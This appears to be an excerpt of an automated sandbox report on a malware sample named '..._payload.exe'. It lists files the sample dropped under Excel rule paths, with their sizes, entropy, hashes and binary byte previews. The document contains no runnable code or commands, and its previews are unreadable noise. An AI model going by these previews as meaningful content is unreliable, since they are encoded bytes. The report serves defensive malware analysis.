                                                                                                                          Preview:<?xml.Uo.m..B..;.^c..J.c.... |...k#./.Z.e...h..P@..0.{....^Y|)..RO...!..Z.J.0......*. .........=.B=.b.#~.FKo.g.6YWh.#F..e...UpJ....0/.D...u..y.ox.]r.PR...g..V..u.{B...Z1..1:`b.... ..|m..g.........`fl...5.I.W=Y3....+.;x.^.\...m..F1...n'....J..<...a....3...=.....W3/.......-.'.Z.1........R...U......9.....to?.I.1..CU..5.y.%+.........M.c...2.E."..rHV.b...W{.tH.g.WQo..P.k...x.:gMx^.H...<*./...o......"..:.y..../. .+t.G...'..]..T."V....>.K.h........?P...._..F&.....I.euJ.4.Q.....3...E.v.....Z.m.b..a.uo)j.|8L.0"t.@w.-..Yw.+.].~Ez}..v;.......Q........^...qr...4....<Hr.e..9>;..J......|._.}Q.E).}M.3pt..!u%..L.u.o...~d.P.....1.G6.*Zt..*JF9+..Q_.t..$9.....2x.H.gUy....97w....'._..!D.6u`..Z.........Xg......i.a`i(.Fq]A.c..I.mN....S.Cd....d.....@)...... @{.7...v..k....zH..!.`...%.c...RY....l.U..n..!.t.X....:...[e?4.&..X....{..d..aM..s.:.J-`...g..........9ft..!K...ku.b.>?.....R:K.y..d.h..;p....C....C...._.B...t6.^2.Dm.-.+x..q...zRol|g(......6..C.y.|x.Y?

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10781v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):813
                                                                                                                          Entropy (8bit):7.734100365481547
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:U29akYdD7alJa/aZ+r9K3nWQdP+mbHd1bD:TIfalJ4++r9K3nWzGlD
                                                                                                                          MD5:639341DB7E4D91A5A3DA471E4F1D693B
                                                                                                                          SHA1:C9FE3B56F4151AA0B2C1B7E12DEF280F1E1F5302
                                                                                                                          SHA-256:8D902A9693A6DD75D963FAFA63EC0D8091C6E2B56A8D41950CBE0AFB15EECB8D
                                                                                                                          SHA-512:3566C6BC57AACA4650DBB7319BC66E63C499700C7436666AC79F88390FB7D7C22F95A5258C008D0F6FA174B332E6742C7049DC2F68455C4C295199DA9205EF8C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....w*.|.$..8V..T..fz.Huw..D........q....?.}..J;..b..M..R..z...ny.&6....x..5.$w.b.WT.a.au.p..1&.*.....q|8B...*[.....!...'.d......^..._y.W`.rG.'.H..i.-'J......}c}+..%.g.rS..-4..W.i=i.z'...Bh+.F.a..m.q..ME.B....O...0.)..L.....S+....X.rm69S>.6..h...z...o.i.$..o../2.%.n...@.........O_>qEJ..X.h.y......]......r..cR..u.i.l.2.s...*4..y..3..t.]f.....n..&..;g.w.>......o..7h.......A..;..L,. ....x...I....Dk^..5F`...x|e..%..FX..}@.sC.'.N../.^...q.....>c.Vh..Z6p.R=H...".zu..!..nXv6[8T7.NT...K[g..t...<E;.;....Vde....!Oa.....%.)..Q..X!..X,.h.=..^......G...]-Xj..DZ\..G.4i.{.B.l..!.gLe4...x.."...tZ.....Z.i...(.iu....b..$*...tb<..G.C\9.......$.!NP.....cn.6.KW.....&{.\Z......zj.n.1b...U.4.@.%..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10784v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2070
                                                                                                                          Entropy (8bit):7.912398240542192
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:kSnrN0assZ+whtHYgkwBjCj8owxZ8B58fa2uJj1D:kSnRjT+whtYtwB24P9s
                                                                                                                          MD5:FABB74DC2ED8EE419953FB3AFE2D3F8D
                                                                                                                          SHA1:BD278270B2E98ADD86724DFA3AE0F68C374CA9D4
                                                                                                                          SHA-256:BC5F3DE79D3E9A5A5E1B4939877A903ACAABB34BFD992D97A969D3E956AB611B
                                                                                                                          SHA-512:F785DEF501063CA11BEBD752030904BB2434687DB3E4A0E59D35FEBABB612793A4565B3394478F48F97EC1D0E0B34108AC60E2DD2A33A3B749B5F2352F89326B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......7OoedX....C.....t.R..|......K.y...l.#5.{Or..T8,Z.....{>.(.~4..Zn....JM... O.T.......Q-..)=..b.|A..^......!.a@.j....3"..|6.w=.S....Lg.W..d.(..:.^u.....p.Q...n7.EnF.N[....!.......pKWK.Z...7.cX..&v.$.G.P.......3e.5....w..(......@m.r.}....O._.].."L.&..n.k..>.=...`..V...1.jg.>.}e...a.....q.....Z6..A..nw^..@.....gX..:...H.6].Wa....{....6{K.'..1..Q.h.f.!./..C...~....73. .w.ZG.o...v...8[y|.yd..W...\at.}vW-4,{r.U.^.W.=.5.......B.A,J.x..3...IK....._..j...>$..S...2.vnN..........F...R...o..GS.D9l.TOj:. X.Pk.d;7G...b..............82...v.F..C w.i.9.9.C..q...n..,..Rw.5.*.&?...'.}......'.,}V.....r.3...<....21.\L.......D.x{....b..........Q.iK.....T.......K.....M...t...6..W.L.............ew...E....m9H~U.W..!.#.D..........4z..G...gd#.!..m.........}....dHeDz...A.U.E...o.$......P..d..Ru.,.....Ak.!.H..J...E.v..[Sw.U.@.^.....Nh.Z9.W.D..dy(:..oUD...........I.u..._........n.. a.h....Y..-...J]...^0$9..s5.tO.....::..(.L.[P...KrM.{.>...J..Y...9$..b...).db.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10800v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):789
                                                                                                                          Entropy (8bit):7.736112970330059
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Z2ODy4tM/7nWsCvgRVd1scw5x5nWzv+bD:s4y4tgiv41scw3czUD
                                                                                                                          MD5:31E42C53857DE6A9F026373088DD9BDC
                                                                                                                          SHA1:438BB831F9209EF813D58243B88EADD1F6476C24
                                                                                                                          SHA-256:D3DC79D6E9EB8A3E9AB15118B3A9C650279F24C7D3EE95C5D1B89F175596A7CC
                                                                                                                          SHA-512:FA264F7ECFD293DA88389081B968871E624A2650C39DF9317583DB2FC6AD4AE03EDF30907361C97D83B25947538839728E288C8CF8A0A3B79C805812FA2F1A34
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..Jr..9#..Ns.g..|....f....[)!cqg....d.C.L.R..c.Fc...,.b/g.hp........"....kZ...W......{...y..:..D.2.....d0_...)..*yB.y....Z.....4C....<C9$.l.$.J$.p..Y.M2Y!.MZ.....<.?..K.`.....0"....."....h.....6`h?..,..p_&.5.T.......(Z.4L.p.Z#...)Wp'...\e5..e.&....U.V..U...L....:v..."...~...W.....](....<H..SR.X.29~........cm.L.....vd.......a.)..f.n......<4.....l.. w.G=...\..2.a...0......'3g...O..wLS...C&.[.q.!...a.w...D.G.U...!.S..Nz.[....|.+.pa.}.....c.....Sh..;...0. E.../.".....R...G.....n[.RjZ..45...f.U|"..'....V.p"..Uw}.s...9Hb.+.<.W...j@.<...(..,.......5Nx...^g.x.Zro..<...>.&(z,b.:..>.:A...lM... ...%..Q..#."..:.k.wA...w(v4 =..w.H.%.$.....-..,t...r...1I...6{......k......phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10801v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3017
                                                                                                                          Entropy (8bit):7.939779320920425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Tcpak4KRRxdrmlLHvC8tSQtsn1uxXvz/Y27lR7vF/njfugwuisuUr1ju+LwDNyxO:TcHXRHreLPBenmfz/Y47t/nku7ooQsm
                                                                                                                          MD5:E993E5963E13CDF9085DCE9F057BFC94
                                                                                                                          SHA1:4AFDC956E0DD1E76D45179F65C267CD0C28B598F
                                                                                                                          SHA-256:AC7AE4949F41291C435547F7E472B17F9EA4584EA6D0093996CA0858542E215A
                                                                                                                          SHA-512:302F63E3ECA627F8D39A3AC39614B063A46FFD42B76AAC360AB3D8003258C542E00D655EACD320F09E8A2E829EBB4F3B98413BF843C7A6C6BF8BFAF2779C87FA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...O...;.5hR....2.y6|...X.....Dw+.........q...D...Y.B.*...d.6.8zqo~...b.'|e.......@.m.[.+7TZ.LZ..E..=..z.k50.X....U.....cHuf."n..8.....|. ?.q......c.Gw...*.V.KY..k.$.T[b...8tjVK..*~.(.#!...d..G.......<N..M.!\..$.=EFk....6......9.$.|...~_Ui...9.K..Y..#.n4"...A..Z.Jo..w...4.o.r.j.&..U.SP...9zWL.G....C....d.......I.W......y...z...,..,..<.Z9]2t..o[.M.2..\..@...D;G..9..'.......HfuQ.T.Y....p.!..!.&Qw....c*._.]v(....^..|..J...l.(..X..y#f{?.Ky4..I......~b.kcZV...t..]rPa.%..Y..V..mS5.....i.8.u=|..{....F...@.....(...aK.@.g..E..]M.d...+.......h..|~.1x- %.......P..2{...*. #...(X...~.U.A...z...y.F..&....-{.@.......6.$....j.np..My...C...$.R.QVm....n7...TP...R...W2.IqQ...c.....N..)4..?.8...L...Y.....E.5.....s...o.|.. .w%..Qw.N]%..)........k..x.....i.?..A..Ie....D0./w..q{eq..`8C.+.X..<.....#Y....7GTd)0.j.@..P..E....+..S..qJ....V.;..zd..........N..m..J..{.I.....F."...AIB"F?.....}...u..........U.+...t....g.D...........I.Zc...g.....f.7..g..?..Ia.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10802v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3017
                                                                                                                          Entropy (8bit):7.929144106050267
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:D3jAKndAnWQZIoPuq+hv7Rb81aTJ7ZG32cLR12g0TEY/Tz3QX5g28/ASDfYTiEDi:D3EKnSn5lP4x7RbgaB432ckTEYLD284e
                                                                                                                          MD5:9F8BB63C16E4AC41D7C254C30D392AA8
                                                                                                                          SHA1:BE9A70257B2E027924E49DE372E73811F490C018
                                                                                                                          SHA-256:8B2CEBEF03BA6DEE0FEFD1DAC01680F04232018FBEB798A978D881E2498B5882
                                                                                                                          SHA-512:71BF92AF51793126C9A5FD31D0BFC747F6935BAE64B3E9184758A123FF25B739FDE1A77B0C2639B5C08285BBF4C4E564AE5870E569953931F1BCA5C8292FDD0B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.4.&|.&..t......{\...Y...{......l..D..F....{|aNX.ds....".%...UAh..]U{.....6....fR.....u.l...l9z....wZ.\............0..=..W...9sz...48.1>..p..j.o..$B.;sRI...+....8K..."F...6...Q..U%/|7@]..........F....w..M...d.].........I.s.IM.$2.>^..r...:..d.....sd.!..g.k..b;...e.C.......J..f.Mak..;.m"...3...4..6..}..V..+!?u.5...Rt.S.0......?.y....S.<%..V/.P.f..v4..Dn)e~p.L.ef....X.....d_......2..|..-...g.u...@.*oS..xtt~.e.kr'..7....a.........*....4>....Y!..y$........G.L.1.......F.^?..u.d]j`...v_N.o...O.!.~....f\...Z...x.61.Kz..u.<jU....h%........./+?]EU.w.c..}..)aG...fD1.....6...@.R#....o.....FI..8.>....U}.#5.K.'M.&k....M.Y.......S.w....M5..W+..h6.._...P...sahDg..\..d.....at@...$Fy....K<.d.m7].{...9".\[b...F....lw..<.T..n..#.6+,...4......L......+,.G'...L......M..a..@..k.....?...8.s....Hz.s...!.....Ohw@.t...U...N1.S...Y.9.6!.-..+J....xI..|.cs..s...wnk.Z...-..*...xr...M...5.).......{;.......S..q...#..h....o.<.......]....&..I.(..\.yg#....S..vc..5.z({2Y...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10803v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4639
                                                                                                                          Entropy (8bit):7.957929182595904
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:QGEDDSoYzqA3h6iM41ZlyzawrKiCqaeJgaKfPqPxrgAh54:tAlA3h/z1Z3wx/2amPqZh4
                                                                                                                          MD5:3B6B8F505A98D80F4264BEEB387F72D0
                                                                                                                          SHA1:0051886A96BC829CB432A264EB5BC51E605ED436
                                                                                                                          SHA-256:117163C79E2F4EFF659D6C3BD6916BDB14B1A11A1AF3EE6F9D46939D052F8C1B
                                                                                                                          SHA-512:46D75056756CEE9FD3E1E8B16FB760BCEF9C701CF42E599D18A955581B8A8E7D0EE1AD857D98842C52EF12F29A966AA03CB41A2104145641D1D26D30848B1E9D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.S.H..J...+..+.G.}.q..8. XW...m.........rLD...#v\....B._^$..H<....h..V...V....f.N.Y.V$...(....dv........A.Rbw...E....[S.!.....f.ZN.Pd.|..d.n....m.2.b...<.Q8.j......."..C...I..*x.GP8.'..I.........c..7[.X(........go...Hx.V......W.t......+...F.O.....Jr......s.h......^....OcB...K....L...,...XS...+J.\Xn^@.Y*;...#.}.a...e....g.........Vq...a..^....}O."t....y."..G.....X.G....+.......h..)..]8...9.3e.9.\[.%qfWx..\..q.rh.q].......y......]...CsA..C.....Q.f_p...6m.q.%m.;.H;..V.....y..Q....1.XH.....R....G.5`...;J....K.@.*Dm.........l.Ei0.."]........D..FQ.$......:w..~r(.!i...7..E..W]....-h....X.....,.&...\#^."e.K,5.^...K.6.s. ..B@B.8.}v.O#L.xU......}nx.k.(..%..9.<..R.:.I.......~...?.V.z...w..H.7.._...Y.....4...A.:.x(9A:...(..._.C.....T..4...b=W.b.....e. ...8....70*..$}D.G..*.|.5...b0|....N...n3.A....Gpe..1F..:...eq...;...GL.^$..X......5."-.!...=..!T..*...n....xEq...h...2%.E*.......|...kN...s.O."..dy.=c.Z:H.....:.Z.;t.`_1...m.='.cbF..{M#.#.2.,.}Q..........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10807v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1329
                                                                                                                          Entropy (8bit):7.842385990438247
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:OceAbq1aIKLhcRmBmOOn6GhtWyo8Mexm/0miaden6QR/bD:dhXLhc+PnG+JkmTijD
                                                                                                                          MD5:1174298BE09FF4CA68B82377432641C4
                                                                                                                          SHA1:447F57A527906CEFDDC2E6E4BEE01EE0216A172D
                                                                                                                          SHA-256:465319107B9B0689D608B0486868F31F9BE1443A234D3A66C4D612CED0DD00B8
                                                                                                                          SHA-512:A1D3EDE4F1F0244135807905706D931657B3D34B78108BFCBCADB4FFFB009A59CA4A58A763AA553A19EF7F26B00593A68069866C8F55357B72949539E5D33155
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..o.hw.R....|McI.<...h?.......1..fw~..V,'{.W..u......*p..kK...T.....M..6..G6.a5'$..s.j+.^.k&...I.V.<*/..k...B.T..#...s3J..X..u.i^.....Y....&/.'...fnlx-).;.qO.R]..r...gd,.4.=....q.......%.E..v.......I.Y...+..XuGo..$.{...Y..Y.y..?...`QDy..8k;.t..z...!..r*6....dh..Y....7..x...-f.O.2M`..........J.Vr[2....:K.8.(A.E..A.#.(L.p.y.)H.'Q|%....#.Y....X....Xx..4..%.3...M.W...v...T....B...#o...\8E.X8`Z2.0..?.>.....'...........(...J.......8.r.b....;..h.>a.....U#..b..5}.;Am...p..u..p.....[..L......T.....@..d....oo.....'5d. 6Nv.Q.BSBX#.....%.o.....@ ....".b...*kX%..2c0F.e.........y_......Z..}c...?.3.....U.t.s..v1..../........i..@-..E.;?.L..Kc..9u.P.._.y....Td#.G..n ..(..]..zZ8....V.....^k-...t.5.5..q'-+M+.".?._.......GSw.HJ4..<A...D%..l..j.>....m...lZV.6.M.[{...X^Es. ...2....`....7.X...Pd.<Z..0.CQ....DL.L......-Jq4.e.....c}..SQ....../...6.L.....z................p..,.Q..d5..}...-.......^:i...B`......P.d[.....O.B...D.u..bd.. ......)..YN.......m.f..K....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10808v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1395
                                                                                                                          Entropy (8bit):7.8435276903764075
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:11mqzGlXnEeCPJYuXbfU0yEFHpN+midvGxrvSTSuVSwsBgFmtPmmCHXIn/SxbD:19z+yJdXg0jFJNOdvkrvS+uVtsGFmxlq
                                                                                                                          MD5:15AFC8F4F71648BAA86821ADF68BE3C7
                                                                                                                          SHA1:1ABE6C46B733FB8D750C62BD50D4093658BE071D
                                                                                                                          SHA-256:465B2574384CB40A4640D1F478522D6DFB627CCA4731F441059A7F912C1A6677
                                                                                                                          SHA-512:B537238CA773F6E58CCE6A9D96A3D52A4C78706FB05A7DB2DE7BA67EA83AEA813E19002F29E3C054B4B315721A7413820295EB89A947B31CBCC83896B2C64701
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml^AUw.3O+.O...>..a3.p.W.hJ..Bn..h....j..-...F.k.sJ.}..od30...q....lxqX.l0'....K...w.~...GU.....WYdw...y_._.....=a._..@..~wQ....^.{.R...t.#.`}w..n....iv.0.~...=.K.j.|....E9m.Jt2.#MJ2.(.Y..5.......A..Y..<...^@!...p.1GmP....f.h.X8G;N.W....y...........".,.k.=...n?.Sc?...R.....#E.,_.0M..{....+....47.....S"'.P.0.=....8.....7..|...._.I......t.2.6s/..%.q..8....-.p..Qu.......a.3...W.p.{`:.....C2..,(...`...5o..T..8..)V2E..NI@.`#....z.<1. .S9c.........}Oh.k.v3..;aP.....S.+........Z.5s.....6....3...e......2.>.X]..}ZD....K.Lc4./.....,....;..D.^..:..x..tC.,X&..{.h....y.p... ..N........0K....9..W........QTv1.U.r2.$y..(..W$..c3.0...-2^...h\g...9.Z.~B."....@...5...b.JB.*.....G.=Y..'D./.........C......V.gP..]T..^,..K.|..j.U}.R.@....,.c......}.clX..F.L..^a...j#..D&>|.GL .f.q. 5(..78..T.#..@.....<.T1V$5.6..sg.!+}.L.......V.pH.K............../..v....C...C.M.1...-...^F....^t.|Q.y...sY.>...VIS...d.U7.!q.E/.6.......n...A+J.t0.,.B..f.4..g..@.].....ioG.-)."N.s.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10818v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1124
                                                                                                                          Entropy (8bit):7.813217902316291
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:zbMaU191dl3OFAi9andcpDZxhQA09SFtnFUf+KCE5+rGEyCHlLddBmxiX43dDxxF:PA15SxhQA09y4+rGEyqll8iWRHe6VbD
                                                                                                                          MD5:B59D3BE9E7619FE02CFB158A55CE4B90
                                                                                                                          SHA1:0CCB7258F3D5A7AC5E77E13BAA9B47887EE49518
                                                                                                                          SHA-256:652EB5E0DCEDC3543AAB29731A373D43864F3188A19A8A91DF20025B8C9F34FF
                                                                                                                          SHA-512:D90EF9E44D36BF603D09A114CF7C3183F8841933BAE32988F74414F1099C1C12C25B8961A7EC13F3EC613C95EF44FE4F1FFC6C41B2B6FCFB49252DC51C0013BF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml(.....m....R ..@...U.7E.A.!0...Z.Y..b..k..M.V..9.F.+.!*V3.....Tjt.iA....7.j..:..t.a...#.{vpF..3.....u....5.^:...)*.Q....U.....L}........$......Yc7F.J2%;.,MP..iG...z..&Tz]?X..'.D$.:.g.7+.O..H.B.8.S.rs]........P...J~...kCLJ7l.....NRi......wb..(4.....|.q..>..PD.;.R. IH..ml..;....%..,.#.Q......UD5...!xQ..@D..4m+^...F..$C.Z.J.Oh)S.R......9Ec:a..+..b..$&.T..^..0...,..b=..o.....WX......E.tB....I...u...o...Xk......4..U...G>...h...tA.....g#...O....o.G..l ....A_'...Y^|.V.=...#....U..m..yp...-).s.'...A...$g..lb.h(...@MX..\j.n0..$..p7P..[..i..b.n..@).........i.L.j$..Fy.S.+.u.]x..u.%.RD.........;...g.FA}.K.]x.\a...&.:.j6>...D.kbz....=/......e..}...`...n....~Ex.9P.?....\8.}.4..;i4%...I.qrJx....{jxqR./.V2..6.<@.gL\H.4.D.Pb.{..%.q.t.W...[..........y?.M]i.s...SL.#K<*C..F..r.....X.9t.hg.F.=.1[.n.z.WW.Zg.L....$....Ud.9.3S!.$2(Iv..I...}q.D.Ie.S...X....!g....#.7Z*..3m~x.8.......~....^.TSD..\s.].eX#....A f..5w.~[....N.f.......W.c.b...[..|..................8[rj

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10819v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8769
                                                                                                                          Entropy (8bit):7.972799585217822
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:StV4oAZu9q1r/VYV6ekK1ohH+jJWmfw0uCFT/y+JA6YRQ/u:KKfZu9k7KUekqjftFmvO2
                                                                                                                          MD5:69C1A32636F715BFE3F76D7A4BAB737A
                                                                                                                          SHA1:DD7BE11BB72DC1F9C5FBA72079D10E4DF49ABF9A
                                                                                                                          SHA-256:0A261E5037BDA8779CDCA8FBADFF5DD1A3E026D29B7ED51C65B8DBA7CE43C8B3
                                                                                                                          SHA-512:8178BFD99E9C8101932FE317FDBCC5182B4E7535D2F6C32DBC85A283AB117E0083B00D990E5E69071FC6C2ED0DE86C660335AA4394EFF743649BD0829D384B6F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.n9a%'{C...U.B{........7D.......[.b./..9.c.M......A..]?;r.+X?....'.k.tbI....[.;.&Y}D..R.[...}../-b.."Rf.'.^..dC.:..._U.|<.L.....N.5.?...].FU()..v...r......y.VQ....Z...jQ...0l........:.e.W.1.,.~.|m*.,.........6...."..aT}.i...I.../.....&.J......Q.j.3....U.......z....R.....R.p.m....Qv>r.~.lqh.cKZ.0....=O.xqU..Cd..Q6x...........d..d...5...Avb.....?F..M....CK.a.c.-*..#.oT[Z.*_.J^.]BE.LL.j...02....#+...q...$.... y...*,.4..........s.H.NI..\N...p..bT......h(KB.B.ON*<...V...j..Qiq..J....S.....Y;.P.... .)...w..&7V.[:......,_.}..-.S$.K..GI.iTx.+..Vh?.9D.,......h..E.G.D...<. .;C...{%i....@...c......<.,Q..7..Mc..'o..p..7.M..K.i...m..,.M.......G...X..17coK._.V....h\.......h..G....4.T...0..$...r.....:...R....`..A..2B..!n.....4......`.L.S......>......2....y!Q+(.X...j...+....V.7.N=....O.V.....8.......e....b...jf.-L.....Ll..z...,.U... .D=#....../.c.B...B...X...6..$.a.Al@Q.(H.R.|....X_*..C......z.4.<........$O.j?.z.`.]Sg..M(......>.l...*?.O..\v....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10820v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5842
                                                                                                                          Entropy (8bit):7.973600241038194
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:xC2kjsun4U8PnjLzKpUyV9eywUBTnofKs5nBwObc7LkrT0s7RV:x+YDUgnjLmpUDQlnoy+yssLk/0IV
                                                                                                                          MD5:39F3E776A7AC9436AD9BA2F3DF1F51E9
                                                                                                                          SHA1:303ED445DBD68CF603A8BA375651D797C3D3856A
                                                                                                                          SHA-256:BE61A0FBE1EBB3AC733FA8E79490F6CD1B19810FD6F4054B50A4A8D5836E4E8B
                                                                                                                          SHA-512:05E42CE8541AC35E4074B566795FFAFE7132BFF864C8D315B88B8D5BF81163332E46E02183125E44E5AB8CE349955B4B6C9BB54FB0A8DF9F89B590DFBA4EF2EC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.h]M(.3....sz.8.......:..O....y/.t..q...@.q..*.c\..Pyd......Th.$x.N.{.@..}.4o.Xag-...k..6.....f....M.2.....Q...X...&s.N.,...B|...-.h.2-.4$Q.....A...%-...\Io.....(.&i.rH.....O".^#.."..?.o.#..Grp3,?...._@......KI.;{........Q............H..T[#........P..;..%...:.......A..J...q...SW ..4<dmL.X?.\d1......u#.>k.Z....~..u...=5...F..l.=_E....s.t..@8.\..ZK.81Q..m.KC...7.`....RN..O.X.v...2R....yu~..%kY-.z.AH...o..z]k_.... `h....$.@.....!..Q..(....y....N....V.._..........L..Vw.tj.r....i.........d......R.(.`.*h%.H[*.,|..9...R.]KB...vX...+d8n.#..e......... X..}.'..;.Qx.pBW.xY..=.g'.C...&Ch.".=[....>.csSB.:..`.sI....8..+\p~.z.$(....{$...rA..M.OC........<.#A..J.......zX...g.g9.@...Y%.'........L_.I.EZ;.G0.g."@t5.+.>.U...........J.1...4..).LC....h.rQ.b...P..../d!.q......ZH.4..ONi.:#E.........Lb..#..V..0..{P.4.9/...<....O..?.>-j.\.y..ge.u.9..:.....L........x.%...$.r...&Jy2.......|T...:.W.5c. i\...+7A~.&R..........(.Z.]..6..d..P)..FaK...]..(l.jj..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10821v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4787
                                                                                                                          Entropy (8bit):7.95666690519626
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:4ZeME7bQICB8ZjoPYECLBZWVzEUt6BDEhXnLx2Hw33gf2:4ZzzxB87eE66BeXnLEH41
                                                                                                                          MD5:9B8BC016705490548AFD32369D786121
                                                                                                                          SHA1:E9EDEC780220B9631AFA737FC4C873CDEDB0904D
                                                                                                                          SHA-256:245997C1CEAA8904719FE1C4E7BB92DB30208B040F4907992B77A38E198FA309
                                                                                                                          SHA-512:E8785CFD74EE4BEC553ABEEB76D5B51DD9EA94229AF1298B8D4777FEC3C33CACC69BB05D723BB2D7A24389CE96349DCE68090B7EFE9E486E88501C785751512B
                                                                                                                          Malicious:false
